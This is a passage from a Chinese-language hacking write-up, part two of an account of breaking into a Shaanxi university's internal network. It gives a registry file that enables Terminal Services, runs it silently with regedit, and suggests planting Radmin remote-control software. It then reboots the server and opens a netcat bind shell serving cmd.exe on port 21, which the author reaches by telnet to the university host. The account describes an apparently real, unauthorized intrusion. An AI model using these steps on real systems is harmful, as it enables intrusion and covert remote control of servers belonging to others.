偷天换日之入侵陕西某高校内部网( 二 )


REGEDIT4[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]Start=dword:00000002保存为b.reg,上传服务器并运行regedit /s d:/ccs/index/b.reg 。如果嫌开Terminal服务麻烦,干脆直接传个Radmin或者其他什么远程控制软件设置端口为21不就得了吗?Step three:重启服务器 。上传个reboot工具,执行重启 。这是为了Terminal服务需要的 。如果使用其他木马可以不考虑重启 。重启后,在用domain运行net start ,发现Serv-U不见了,呵呵!那么,现在就可以大摇大摆的进入服务器了!这里我随便上传了一个nc试试效果,执行命令为nc –e cmd.exe –l –p 21,然后在本地执行telnet xxx.xxx.edu.cn 21,返回结果 。
【偷天换日之入侵陕西某高校内部网】

推荐阅读